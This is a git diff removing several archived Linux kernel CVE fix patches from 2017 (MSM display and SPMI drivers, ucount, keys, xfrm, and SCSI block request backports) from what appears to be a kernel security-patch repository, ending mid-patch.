- drivers/video/msm/mdss/mdss_compat_utils.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_compat_utils.c b/drivers/video/msm/mdss/mdss_compat_utils.c
-index ce786f2..35b1b49 100644
---- a/drivers/video/msm/mdss/mdss_compat_utils.c
-+++ b/drivers/video/msm/mdss/mdss_compat_utils.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
- * Copyright (C) 1994 Martin Schaller
- *
- * 2001 - Documented with DocBook
-@@ -965,6 +965,7 @@ static int __to_user_pcc_coeff_v1_7(
- struct mdp_pcc_data_v1_7_32 pcc_cfg_payload32;
- struct mdp_pcc_data_v1_7 pcc_cfg_payload;
-
-+ memset(&pcc_cfg_payload32, 0, sizeof(pcc_cfg_payload32));
- if (copy_from_user(&pcc_cfg_payload,
- pcc_cfg->cfg_payload,
- sizeof(struct mdp_pcc_data_v1_7))) {
-@@ -2160,6 +2161,7 @@ static int __to_user_pa_data_v1_7(
- struct mdp_pa_data_v1_7_32 pa_cfg_payload32;
- struct mdp_pa_data_v1_7 pa_cfg_payload;
-
-+ memset(&pa_cfg_payload32, 0, sizeof(pa_cfg_payload32));
- if (copy_from_user(&pa_cfg_payload,
- pa_v2_cfg->cfg_payload,
- sizeof(pa_cfg_payload))) {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6426/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-6426/ANY/0001.patch
deleted file mode 100644
index 1243066b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6426/ANY/0001.patch
+++ /dev/null
@@ -1,124 +0,0 @@ -From 80decd6365deec08c35ecb902a58f9210599b39a Mon Sep 17 00:00:00 2001 -From: ansharma -Date: Fri, 20 Jan 2017 14:43:57 +0530 -Subject: platform: msm: spmi: Fix possible race condition in debugfs - -There is a possible race condition when debugfs files are concurrently -accessed by multiple threads. Fix this. - -CRs-Fixed: 1106842 -Change-Id: Ifd092143f428db3cf73c45ec4f0aaa96318ae165 -Signed-off-by: ansharma ---- - drivers/platform/msm/spmi/spmi-dbgfs.c | 37 +++++++++++++++++++++++++--------- - 1 file changed, 28 insertions(+), 9 deletions(-) - -diff --git a/drivers/platform/msm/spmi/spmi-dbgfs.c b/drivers/platform/msm/spmi/spmi-dbgfs.c -index b0a354b..86f1b0d 100644 ---- a/drivers/platform/msm/spmi/spmi-dbgfs.c -+++ b/drivers/platform/msm/spmi/spmi-dbgfs.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2014, 2017, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -69,6 +69,7 @@ struct spmi_trans { - u32 addr; /* 20-bit address: SID + PID + Register offset */ - u32 offset; /* Offset of last read data */ - bool raw_data; /* Set to true for raw data dump */ -+ struct mutex spmi_dfs_lock; /* Prevent thread concurrency */ - struct spmi_controller *ctrl; - struct spmi_log_buffer *log; /* log buffer */ - }; -@@ -168,6 +169,7 @@ static int spmi_dfs_open(struct spmi_ctrl_data *ctrl_data, struct file *file) - trans->addr = ctrl_data->addr; - trans->ctrl = ctrl_data->ctrl; - trans->offset = trans->addr; -+ mutex_init(&trans->spmi_dfs_lock); - - file->private_data = trans; - return 0; -@@ -197,6 +199,7 @@ static int spmi_dfs_close(struct inode *inode, struct file *file) - - if (trans && trans->log) { - file->private_data = NULL; -+ mutex_destroy(&trans->spmi_dfs_lock); - kfree(trans->log); - kfree(trans); - } -@@ -473,14 +476,21 @@ static ssize_t 
spmi_dfs_reg_write(struct file *file, const char __user *buf, - int cnt = 0; - u8 *values; - size_t ret = 0; -- -+ u32 offset; -+ char *kbuf; - struct spmi_trans *trans = file->private_data; -- u32 offset = trans->offset; -+ -+ mutex_lock(&trans->spmi_dfs_lock); -+ -+ trans = file->private_data; -+ offset = trans->offset; - - /* Make a copy of the user data */ -- char *kbuf = kmalloc(count + 1, GFP_KERNEL); -- if (!kbuf) -- return -ENOMEM; -+ kbuf = kmalloc(count + 1, GFP_KERNEL); -+ if (!kbuf) { -+ ret = -ENOMEM; -+ goto unlock_mutex; -+ } - - ret = copy_from_user(kbuf, buf, count); - if (ret == count) { -@@ -517,6 +527,8 @@ static ssize_t spmi_dfs_reg_write(struct file *file, const char __user *buf, - - free_buf: - kfree(kbuf); -+unlock_mutex: -+ mutex_unlock(&trans->spmi_dfs_lock); - return ret; - } - -@@ -537,10 +549,13 @@ static ssize_t spmi_dfs_reg_read(struct file *file, char __user *buf, - size_t ret; - size_t len; - -+ mutex_lock(&trans->spmi_dfs_lock); - /* Is the the log buffer empty */ - if (log->rpos >= log->wpos) { -- if (get_log_data(trans) <= 0) -- return 0; -+ if (get_log_data(trans) <= 0) { -+ len = 0; -+ goto unlock_mutex; -+ } - } - - len = min(count, log->wpos - log->rpos); -@@ -548,7 +563,8 @@ static ssize_t spmi_dfs_reg_read(struct file *file, char __user *buf, - ret = copy_to_user(buf, &log->data[log->rpos], len); - if (ret == len) { - pr_err("error copy SPMI register values to user\n"); -- return -EFAULT; -+ len = -EFAULT; -+ goto unlock_mutex; - } - - /* 'ret' is the number of bytes not copied */ -@@ -556,6 +572,9 @@ static ssize_t spmi_dfs_reg_read(struct file *file, char __user *buf, - - *ppos += len; - log->rpos += len; -+ -+unlock_mutex: -+ mutex_unlock(&trans->spmi_dfs_lock); - return len; - } - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-6874/^4.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-6874/^4.10/0001.patch deleted file mode 100644 index ed0eb437..00000000 
--- a/Patches/Linux_CVEs/CVE-2017-6874/^4.10/0001.patch +++ /dev/null 
@@ -1,89 +0,0 @@ -From 040757f738e13caaa9c5078bca79aa97e11dde88 Mon Sep 17 00:00:00 2001 -From: "Eric W. Biederman" -Date: Sun, 5 Mar 2017 15:03:22 -0600 -Subject: ucount: Remove the atomicity from ucount->count - -Always increment/decrement ucount->count under the ucounts_lock. The -increments are there already and moving the decrements there means the -locking logic of the code is simpler. This simplification in the -locking logic fixes a race between put_ucounts and get_ucounts that -could result in a use-after-free because the count could go zero then -be found by get_ucounts and then be freed by put_ucounts. - -A bug presumably this one was found by a combination of syzkaller and -KASAN. JongWhan Kim reported the syzkaller failure and Dmitry Vyukov -spotted the race in the code. - -Cc: stable@vger.kernel.org -Fixes: f6b2db1a3e8d ("userns: Make the count of user namespaces per user") -Reported-by: JongHwan Kim -Reported-by: Dmitry Vyukov -Reviewed-by: Andrei Vagin -Signed-off-by: "Eric W. 
Biederman" ---- - include/linux/user_namespace.h | 2 +- - kernel/ucount.c | 18 +++++++++++------- - 2 files changed, 12 insertions(+), 8 deletions(-) - -diff --git a/include/linux/user_namespace.h b/include/linux/user_namespace.h -index be76523..32354b4 100644 ---- a/include/linux/user_namespace.h -+++ b/include/linux/user_namespace.h -@@ -72,7 +72,7 @@ struct ucounts { - struct hlist_node node; - struct user_namespace *ns; - kuid_t uid; -- atomic_t count; -+ int count; - atomic_t ucount[UCOUNT_COUNTS]; - }; - -diff --git a/kernel/ucount.c b/kernel/ucount.c -index 62630a4..b4eeee0 100644 ---- a/kernel/ucount.c -+++ b/kernel/ucount.c -@@ -144,7 +144,7 @@ static struct ucounts *get_ucounts(struct user_namespace *ns, kuid_t uid) - - new->ns = ns; - new->uid = uid; -- atomic_set(&new->count, 0); -+ new->count = 0; - - spin_lock_irq(&ucounts_lock); - ucounts = find_ucounts(ns, uid, hashent); -@@ -155,8 +155,10 @@ static struct ucounts *get_ucounts(struct user_namespace *ns, kuid_t uid) - ucounts = new; - } - } -- if (!atomic_add_unless(&ucounts->count, 1, INT_MAX)) -+ if (ucounts->count == INT_MAX) - ucounts = NULL; -+ else -+ ucounts->count += 1; - spin_unlock_irq(&ucounts_lock); - return ucounts; - } -@@ -165,13 +167,15 @@ static void put_ucounts(struct ucounts *ucounts) - { - unsigned long flags; - -- if (atomic_dec_and_test(&ucounts->count)) { -- spin_lock_irqsave(&ucounts_lock, flags); -+ spin_lock_irqsave(&ucounts_lock, flags); -+ ucounts->count -= 1; -+ if (!ucounts->count) - hlist_del_init(&ucounts->node); -- spin_unlock_irqrestore(&ucounts_lock, flags); -+ else -+ ucounts = NULL; -+ spin_unlock_irqrestore(&ucounts_lock, flags); - -- kfree(ucounts); -- } -+ kfree(ucounts); - } - - static inline bool atomic_inc_below(atomic_t *v, int u) --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-6951/^3.14/0001.patch b/Patches/Linux_CVEs/CVE-2017-6951/^3.14/0001.patch deleted file mode 100644 index a38cafa9..00000000 
--- a/Patches/Linux_CVEs/CVE-2017-6951/^3.14/0001.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From 44d6e10f77095133e3882529a16b686b2305e6b0 Mon Sep 17 00:00:00 2001
-From: David Howells
-Date: Tue, 18 Apr 2017 15:31:08 +0100
-Subject: KEYS: Change the name of the dead type to ".dead" to prevent user
- access
-
-commit c1644fe041ebaf6519f6809146a77c3ead9193af upstream.
-
-This fixes CVE-2017-6951.
-
-Userspace should not be able to do things with the "dead" key type as it
-doesn't have some of the helper functions set upon it that the kernel
-needs. Attempting to use it may cause the kernel to crash.
-
-Fix this by changing the name of the type to ".dead" so that it's rejected
-up front on userspace syscalls by key_get_type_from_user().
-
-Though this doesn't seem to affect recent kernels, it does affect older
-ones, certainly those prior to:
-
- commit c06cfb08b88dfbe13be44a69ae2fdc3a7c902d81
- Author: David Howells
- Date: Tue Sep 16 17:36:06 2014 +0100
- KEYS: Remove key_type::match in favour of overriding default by match_preparse
-
-which went in before 3.18-rc1.
-
-Signed-off-by: David Howells
-Signed-off-by: Greg Kroah-Hartman
----
- security/keys/gc.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/security/keys/gc.c b/security/keys/gc.c
-index addf060..9cb4fe4 100644
---- a/security/keys/gc.c
-+++ b/security/keys/gc.c
-@@ -46,7 +46,7 @@ static unsigned long key_gc_flags;
- * immediately unlinked.
- */
- struct key_type key_type_dead = {
-- .name = "dead",
-+ .name = ".dead",
- };
-
- /*
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7184/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-7184/ANY/0001.patch
deleted file mode 100644
index f07a8bf6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7184/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 677e806da4d916052585301785d847c3b3e6186a Mon Sep 17 00:00:00 2001
-From: Andy Whitcroft
-Date: Wed, 22 Mar 2017 07:29:31 +0000
-Subject: xfrm_user: validate XFRM_MSG_NEWAE XFRMA_REPLAY_ESN_VAL replay_window
-
-When a new xfrm state is created during an XFRM_MSG_NEWSA call we
-validate the user supplied replay_esn to ensure that the size is valid
-and to ensure that the replay_window size is within the allocated
-buffer. However later it is possible to update this replay_esn via a
-XFRM_MSG_NEWAE call. There we again validate the size of the supplied
-buffer matches the existing state and if so inject the contents. We do
-not at this point check that the replay_window is within the allocated
-memory. This leads to out-of-bounds reads and writes triggered by
-netlink packets. This leads to memory corruption and the potential for
-priviledge escalation.
-
-We already attempt to validate the incoming replay information in
-xfrm_new_ae() via xfrm_replay_verify_len(). This confirms that the user
-is not trying to change the size of the replay state buffer which
-includes the replay_esn. It however does not check the replay_window
-remains within that buffer. Add validation of the contained
-replay_window.
-
-CVE-2017-7184
-Signed-off-by: Andy Whitcroft
-Acked-by: Steffen Klassert
-Signed-off-by: Linus Torvalds
----
- net/xfrm/xfrm_user.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/net/xfrm/xfrm_user.c b/net/xfrm/xfrm_user.c
-index 9705c27..cdf887f 100644
---- a/net/xfrm/xfrm_user.c
-+++ b/net/xfrm/xfrm_user.c
-@@ -415,6 +415,9 @@ static inline int xfrm_replay_verify_len(struct xfrm_replay_state_esn *replay_es
- if (nla_len(rp) < ulen || xfrm_replay_state_esn_len(replay_esn) != ulen)
- return -EINVAL;
-
-+ if (up->replay_window > up->bmp_len * sizeof(__u32) * 8)
-+ return -EINVAL;
-+
- return 0;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7184/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-7184/ANY/0002.patch
deleted file mode 100644
index d484354e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7184/ANY/0002.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From f843ee6dd019bcece3e74e76ad9df0155655d0df Mon Sep 17 00:00:00 2001
-From: Andy Whitcroft
-Date: Thu, 23 Mar 2017 07:45:44 +0000
-Subject: xfrm_user: validate XFRM_MSG_NEWAE incoming ESN size harder
-
-Kees Cook has pointed out that xfrm_replay_state_esn_len() is subject to
-wrapping issues. To ensure we are correctly ensuring that the two ESN
-structures are the same size compare both the overall size as reported
-by xfrm_replay_state_esn_len() and the internal length are the same.
-
-CVE-2017-7184
-Signed-off-by: Andy Whitcroft
-Acked-by: Steffen Klassert
-Signed-off-by: Linus Torvalds
----
- net/xfrm/xfrm_user.c | 6 +++++-
- 1 file changed, 5 insertions(+), 1 deletion(-)
-
-diff --git a/net/xfrm/xfrm_user.c b/net/xfrm/xfrm_user.c
-index cdf887f..40a8aa3 100644
---- a/net/xfrm/xfrm_user.c
-+++ b/net/xfrm/xfrm_user.c
-@@ -412,7 +412,11 @@ static inline int xfrm_replay_verify_len(struct xfrm_replay_state_esn *replay_es
- up = nla_data(rp);
- ulen = xfrm_replay_state_esn_len(up);
-
-- if (nla_len(rp) < ulen || xfrm_replay_state_esn_len(replay_esn) != ulen)
-+ /* Check the overall length and the internal bitmap length to avoid
-+ * potential overflow. */
-+ if (nla_len(rp) < ulen ||
-+ xfrm_replay_state_esn_len(replay_esn) != ulen ||
-+ replay_esn->bmp_len != up->bmp_len)
- return -EINVAL;
-
- if (up->replay_window > up->bmp_len * sizeof(__u32) * 8)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0004.patch b/Patches/Linux_CVEs/CVE-2017-7187/3.10/0004.patch
deleted file mode 100644
index a1d4210c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0004.patch
+++ /dev/null
@@ -1,383 +0,0 @@
-From 60ebd48061949405fe6a69aa921d47b40f474a41 Mon Sep 17 00:00:00 2001
-From: Jens Axboe
-Date: Fri, 06 Jun 2014 07:57:37 -0600
-Subject: [PATCH] BACKPORT: block: add blk_rq_set_block_pc()
-
-With the optimizations around not clearing the full request at alloc
-time, we are leaving some of the needed init for REQ_TYPE_BLOCK_PC
-up to the user allocating the request.
-
-Add a blk_rq_set_block_pc() that sets the command type to
-REQ_TYPE_BLOCK_PC, and properly initializes the members associated
-with this type of request. Update callers to use this function instead
-of manipulating rq->cmd_type directly.
-
-Includes fixes from Christoph Hellwig for my half-assed
-attempt.
-
-Change-Id: Ifc386dfb951c5d6adebf48ff38135dda28e4b1ce
-Signed-off-by: Jens Axboe
----
-
-diff --git a/block/blk-core.c b/block/blk-core.c
-index bce8d73..7cb3157 100644
---- a/block/blk-core.c
-+++ b/block/blk-core.c
-@@ -1189,6 +1189,8 @@
- if (unlikely(!rq))
- return ERR_PTR(-ENOMEM);
-
-+ blk_rq_set_block_pc(rq);
-+
- for_each_bio(bio) {
- struct bio *bounce_bio = bio;
- int ret;
-@@ -1206,6 +1208,22 @@
- EXPORT_SYMBOL(blk_make_request);
-
- /**
-+ * blk_rq_set_block_pc - initialize a requeest to type BLOCK_PC
-+ * @rq: request to be initialized
-+ *
-+ */
-+void blk_rq_set_block_pc(struct request *rq)
-+{
-+ rq->cmd_type = REQ_TYPE_BLOCK_PC;
-+ rq->__data_len = 0;
-+ rq->__sector = (sector_t) -1;
-+ rq->bio = rq->biotail = NULL;
-+ memset(rq->__cmd, 0, sizeof(rq->__cmd));
-+ rq->cmd = rq->__cmd;
-+}
-+EXPORT_SYMBOL(blk_rq_set_block_pc);
-+
-+/**
- * blk_requeue_request - put a request back on queue
- * @q: request queue where request should be inserted
- * @rq: request to be inserted
-diff --git a/block/bsg.c b/block/bsg.c
-index 76801e5..0ed26bc 100644
---- a/block/bsg.c
-+++ b/block/bsg.c
-@@ -196,7 +196,6 @@
- * fill in request structure
- */
- rq->cmd_len = hdr->request_len;
-- rq->cmd_type = REQ_TYPE_BLOCK_PC;
-
- rq->timeout = msecs_to_jiffies(hdr->timeout);
- if (!rq->timeout)
-@@ -273,6 +272,8 @@
- rq = blk_get_request(q, rw, GFP_KERNEL);
- if (!rq)
- return ERR_PTR(-ENOMEM);
-+ blk_rq_set_block_pc(rq);
-+
- ret = blk_fill_sgv4_hdr_rq(q, rq, hdr, bd, has_write_perm);
- if (ret)
- goto out;
-diff --git a/block/scsi_ioctl.c b/block/scsi_ioctl.c
-index 1b4988b..ddbcae2 100644
---- a/block/scsi_ioctl.c
-+++ b/block/scsi_ioctl.c
-@@ -233,7 +233,6 @@
- * fill in request structure
- */
- rq->cmd_len = hdr->cmd_len;
-- rq->cmd_type = REQ_TYPE_BLOCK_PC;
-
- rq->timeout = msecs_to_jiffies(hdr->timeout);
- if (!rq->timeout)
-@@ -314,6 +313,7 @@
- rq = blk_get_request(q, writing ? WRITE : READ, GFP_KERNEL);
- if (!rq)
- return -ENOMEM;
-+ blk_rq_set_block_pc(rq);
-
- if (blk_fill_sghdr_rq(q, rq, hdr, mode)) {
- blk_put_request(rq);
-@@ -512,7 +512,7 @@
- memset(sense, 0, sizeof(sense));
- rq->sense = sense;
- rq->sense_len = 0;
-- rq->cmd_type = REQ_TYPE_BLOCK_PC;
-+ blk_rq_set_block_pc(rq);
-
- blk_execute_rq(q, disk, rq, 0);
-
-@@ -544,7 +544,7 @@
- int err;
-
- rq = blk_get_request(q, WRITE, __GFP_WAIT);
-- rq->cmd_type = REQ_TYPE_BLOCK_PC;
-+ blk_rq_set_block_pc(rq);
- rq->timeout = BLK_DEFAULT_SG_TIMEOUT;
- rq->cmd[0] = cmd;
- rq->cmd[4] = data;
-diff --git a/drivers/block/pktcdvd.c b/drivers/block/pktcdvd.c
-index f5d0ea1..caddb5d 100644
---- a/drivers/block/pktcdvd.c
-+++ b/drivers/block/pktcdvd.c
-@@ -712,6 +712,7 @@
-
- rq = blk_get_request(q, (cgc->data_direction == CGC_DATA_WRITE) ?
- WRITE : READ, __GFP_WAIT);
-+ blk_rq_set_block_pc(rq);
-
- if (cgc->buflen) {
- if (blk_rq_map_kern(q, rq, cgc->buffer, cgc->buflen, __GFP_WAIT))
-@@ -722,7 +723,6 @@
- memcpy(rq->cmd, cgc->cmd, CDROM_PACKET_SIZE);
-
- rq->timeout = 60*HZ;
-- rq->cmd_type = REQ_TYPE_BLOCK_PC;
- if (cgc->quiet)
- rq->cmd_flags |= REQ_QUIET;
-
-diff --git a/drivers/cdrom/cdrom.c b/drivers/cdrom/cdrom.c
-index 8a3aff7..1ca0772 100644
---- a/drivers/cdrom/cdrom.c
-+++ b/drivers/cdrom/cdrom.c
-@@ -2165,6 +2165,7 @@
- ret = -ENOMEM;
- break;
- }
-+ blk_rq_set_block_pc(rq);
-
- ret = blk_rq_map_user(q, rq, NULL, ubuf, len, GFP_KERNEL);
- if (ret) {
-@@ -2184,7 +2185,6 @@
- rq->cmd[9] = 0xf8;
-
- rq->cmd_len = 12;
-- rq->cmd_type = REQ_TYPE_BLOCK_PC;
- rq->timeout = 60 * HZ;
- bio = rq->bio;
-
-diff --git a/drivers/scsi/device_handler/scsi_dh_alua.c b/drivers/scsi/device_handler/scsi_dh_alua.c
-index 68adb89..28bf7fb 100644
---- a/drivers/scsi/device_handler/scsi_dh_alua.c
-+++ b/drivers/scsi/device_handler/scsi_dh_alua.c
-@@ -120,6 +120,7 @@
- "%s: blk_get_request failed\n", __func__);
- return NULL;
- }
-+ blk_rq_set_block_pc(rq);
-
- if (buflen && blk_rq_map_kern(q, rq, buffer, buflen, GFP_NOIO)) {
- blk_put_request(rq);
-@@ -128,7 +129,6 @@
- return NULL;
- }
-
-- rq->cmd_type = REQ_TYPE_BLOCK_PC;
- rq->cmd_flags |= REQ_FAILFAST_DEV | REQ_FAILFAST_TRANSPORT |
- REQ_FAILFAST_DRIVER;
- rq->retries = ALUA_FAILOVER_RETRIES;
-diff --git a/drivers/scsi/device_handler/scsi_dh_emc.c b/drivers/scsi/device_handler/scsi_dh_emc.c
-index e1c8be0..6f07f7f 100644
---- a/drivers/scsi/device_handler/scsi_dh_emc.c
-+++ b/drivers/scsi/device_handler/scsi_dh_emc.c
-@@ -280,6 +280,7 @@
- return NULL;
- }
-
-+ blk_rq_set_block_pc(rq);
- rq->cmd_len = COMMAND_SIZE(cmd);
- rq->cmd[0] = cmd;
-
-@@ -304,7 +305,6 @@
- break;
- }
-
-- rq->cmd_type = REQ_TYPE_BLOCK_PC;
- rq->cmd_flags |= REQ_FAILFAST_DEV | REQ_FAILFAST_TRANSPORT |
- REQ_FAILFAST_DRIVER;
- rq->timeout = CLARIION_TIMEOUT;
-diff --git a/drivers/scsi/device_handler/scsi_dh_hp_sw.c b/drivers/scsi/device_handler/scsi_dh_hp_sw.c
-index 084062b..e9d9fea 100644
---- a/drivers/scsi/device_handler/scsi_dh_hp_sw.c
-+++ b/drivers/scsi/device_handler/scsi_dh_hp_sw.c
-@@ -120,7 +120,7 @@
- if (!req)
- return SCSI_DH_RES_TEMP_UNAVAIL;
-
-- req->cmd_type = REQ_TYPE_BLOCK_PC;
-+ blk_rq_set_block_pc(req);
- req->cmd_flags |= REQ_FAILFAST_DEV | REQ_FAILFAST_TRANSPORT |
- REQ_FAILFAST_DRIVER;
- req->cmd_len = COMMAND_SIZE(TEST_UNIT_READY);
-@@ -250,7 +250,7 @@
- if (!req)
- return SCSI_DH_RES_TEMP_UNAVAIL;
-
-- req->cmd_type = REQ_TYPE_BLOCK_PC;
-+ blk_rq_set_block_pc(req);
- req->cmd_flags |= REQ_FAILFAST_DEV | REQ_FAILFAST_TRANSPORT |
- REQ_FAILFAST_DRIVER;
- req->cmd_len = COMMAND_SIZE(START_STOP);
-diff --git a/drivers/scsi/device_handler/scsi_dh_rdac.c b/drivers/scsi/device_handler/scsi_dh_rdac.c
-index 69c915a..3916c31 100644
---- a/drivers/scsi/device_handler/scsi_dh_rdac.c
-+++ b/drivers/scsi/device_handler/scsi_dh_rdac.c
-@@ -279,6 +279,7 @@
- "get_rdac_req: blk_get_request failed.\n");
- return NULL;
- }
-+ blk_rq_set_block_pc(rq);
-
- if (buflen && blk_rq_map_kern(q, rq, buffer, buflen, GFP_NOIO)) {
- blk_put_request(rq);
-@@ -287,7 +288,6 @@
- return NULL;
- }
-
-- rq->cmd_type = REQ_TYPE_BLOCK_PC;
- rq->cmd_flags |= REQ_FAILFAST_DEV | REQ_FAILFAST_TRANSPORT |
- REQ_FAILFAST_DRIVER;
- rq->retries = RDAC_RETRIES;
-diff --git a/drivers/scsi/osd/osd_initiator.c b/drivers/scsi/osd/osd_initiator.c
-index aa66361..11bd87e 100644
---- a/drivers/scsi/osd/osd_initiator.c
-+++ b/drivers/scsi/osd/osd_initiator.c
-@@ -1570,6 +1570,7 @@
- if (unlikely(!req))
- return ERR_PTR(-ENOMEM);
-
-+ blk_rq_set_block_pc(req);
- return req;
- }
- }
-@@ -1590,7 +1591,6 @@
- }
-
- or->request = req;
-- req->cmd_type = REQ_TYPE_BLOCK_PC;
- req->cmd_flags |= REQ_QUIET;
-
- req->timeout = or->timeout;
-@@ -1608,7 +1608,7 @@
- ret = PTR_ERR(req);
- goto out;
- }
-- req->cmd_type = REQ_TYPE_BLOCK_PC;
-+ blk_rq_set_block_pc(req);
- or->in.req = or->request->next_rq = req;
- }
- } else if (has_in)
-diff --git a/drivers/scsi/osst.c b/drivers/scsi/osst.c
-index 21883a2..0727ea7 100644
---- a/drivers/scsi/osst.c
-+++ b/drivers/scsi/osst.c
-@@ -365,7 +365,7 @@
- if (!req)
- return DRIVER_ERROR << 24;
-
-- req->cmd_type = REQ_TYPE_BLOCK_PC;
-+ blk_rq_set_block_pc(req);
- req->cmd_flags |= REQ_QUIET;
-
- SRpnt->bio = NULL;
-diff --git a/drivers/scsi/scsi_error.c b/drivers/scsi/scsi_error.c
-index 3668b1b..c1e4a74 100644
---- a/drivers/scsi/scsi_error.c
-+++ b/drivers/scsi/scsi_error.c
-@@ -1653,6 +1653,8 @@
- */
- req = blk_get_request(sdev->request_queue, READ, GFP_KERNEL);
-
-+ blk_rq_set_block_pc(req);
-+
- req->cmd[0] = ALLOW_MEDIUM_REMOVAL;
- req->cmd[1] = 0;
- req->cmd[2] = 0;
-@@ -1662,7 +1664,6 @@
-
- req->cmd_len = COMMAND_SIZE(req->cmd[0]);
-
-- req->cmd_type = REQ_TYPE_BLOCK_PC;
- req->cmd_flags |= REQ_QUIET;
- req->timeout = 10 * HZ;
- req->retries = 5;
-diff --git a/drivers/scsi/scsi_lib.c b/drivers/scsi/scsi_lib.c
-index 9f3168e..49076d1 100644
---- a/drivers/scsi/scsi_lib.c
-+++ b/drivers/scsi/scsi_lib.c
-@@ -238,6 +238,7 @@
- req = blk_get_request(sdev->request_queue, write, __GFP_WAIT);
- if (!req)
- return ret;
-+ blk_rq_set_block_pc(req);
-
- if (bufflen && blk_rq_map_kern(sdev->request_queue, req,
- buffer, bufflen, __GFP_WAIT))
-@@ -249,7 +250,6 @@
- req->sense_len = 0;
- req->retries = retries;
- req->timeout = timeout;
-- req->cmd_type = REQ_TYPE_BLOCK_PC;
- req->cmd_flags |= flags | REQ_QUIET | REQ_PREEMPT;
-
- /*
-diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c
-index e059ad4..5170506 100644
---- a/drivers/scsi/sg.c
-+++ b/drivers/scsi/sg.c
-@@ -1656,10 +1656,9 @@
- if (!rq)
- return -ENOMEM;
-
-+ blk_rq_set_block_pc(rq);
- memcpy(rq->cmd, cmd, hp->cmd_len);
--
- rq->cmd_len = hp->cmd_len;
-- rq->cmd_type = REQ_TYPE_BLOCK_PC;
-
- srp->rq = rq;
- rq->end_io_data = srp;
-diff --git a/drivers/scsi/st.c b/drivers/scsi/st.c
-index 2a32036..7d74f83 100644
---- a/drivers/scsi/st.c
-+++ b/drivers/scsi/st.c
-@@ -484,7 +484,7 @@
- if (!req)
- return DRIVER_ERROR << 24;
-
-- req->cmd_type = REQ_TYPE_BLOCK_PC;
-+ blk_rq_set_block_pc(req);
- req->cmd_flags |= REQ_QUIET;
-
- mdata->null_mapped = 1;
-diff --git a/drivers/target/target_core_pscsi.c b/drivers/target/target_core_pscsi.c
-index 244776b..dff91ee 100644
---- a/drivers/target/target_core_pscsi.c
-+++ b/drivers/target/target_core_pscsi.c
-@@ -1059,6 +1059,8 @@
- ret = TCM_LOGICAL_UNIT_COMMUNICATION_FAILURE;
- goto fail;
- }
-+
-+ blk_rq_set_block_pc(req);
- } else {
- BUG_ON(!cmd->data_length);
-
-@@ -1075,7 +1077,6 @@
- }
- }
-
-- req->cmd_type = REQ_TYPE_BLOCK_PC;
- req->end_io = pscsi_req_done;
- req->end_io_data = cmd;
- req->cmd_len = scsi_command_size(pt->pscsi_cdb);
-diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
-index e9b04cd..cce84e5 100644
---- a/include/linux/blkdev.h
-+++ b/include/linux/blkdev.h
-@@ -742,6 +742,7 @@
- extern struct request *blk_get_request(struct request_queue *, int, gfp_t);
- extern struct request *blk_make_request(struct request_queue *, struct bio *,
- gfp_t);
-+extern void blk_rq_set_block_pc(struct request *);
- extern void blk_requeue_request(struct request_queue *, struct request *);
- extern int blk_reinsert_request(struct request_queue *q, struct request *rq);
- extern bool blk_reinsert_req_sup(struct request_queue *q);
diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0004.patch.base64 b/Patches/Linux_CVEs/CVE-2017-7187/3.10/0004.patch.base64
deleted file mode 100644
index 514d017e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0004.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0005.patch b/Patches/Linux_CVEs/CVE-2017-7187/3.10/0005.patch
deleted file mode 100644
index 36d3c6a7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0005.patch
+++ /dev/null
@@ -1,263 +0,0 @@ -From 2c5b488b49d92c02ac28f45e68f366c6a51a8949 Mon Sep 17 00:00:00 2001 -From: Douglas Gilbert -Date: Tue, 03 Jun 2014 13:18:18 -0400 -Subject: [PATCH] BACKPORT: sg: relax 16 byte cdb restriction - - - remove the 16 byte CDB (SCSI command) length limit from the sg driver - by handling longer CDBs the same way as the bsg driver. Remove comment - from sg.h public interface about the cmd_len field being limited to 16 - bytes. - - remove some dead code caused by this change - - cleanup comment block at the top of sg.h, fix urls - -Change-Id: Ie8150e5375b3316d5d5206f079c4a50f1c50b755 -Signed-off-by: Douglas Gilbert -Reviewed-by: Mike Christie -Reviewed-by: Hannes Reinecke -Signed-off-by: Christoph Hellwig ---- - -diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c -index 5170506..96d635e 100644 ---- a/drivers/scsi/sg.c -+++ b/drivers/scsi/sg.c -@@ -7,9 +7,7 @@ - * Original driver (sg.c): - * Copyright (C) 1992 Lawrence Foard - * Version 2 and 3 extensions to driver: -- * Copyright (C) 1998 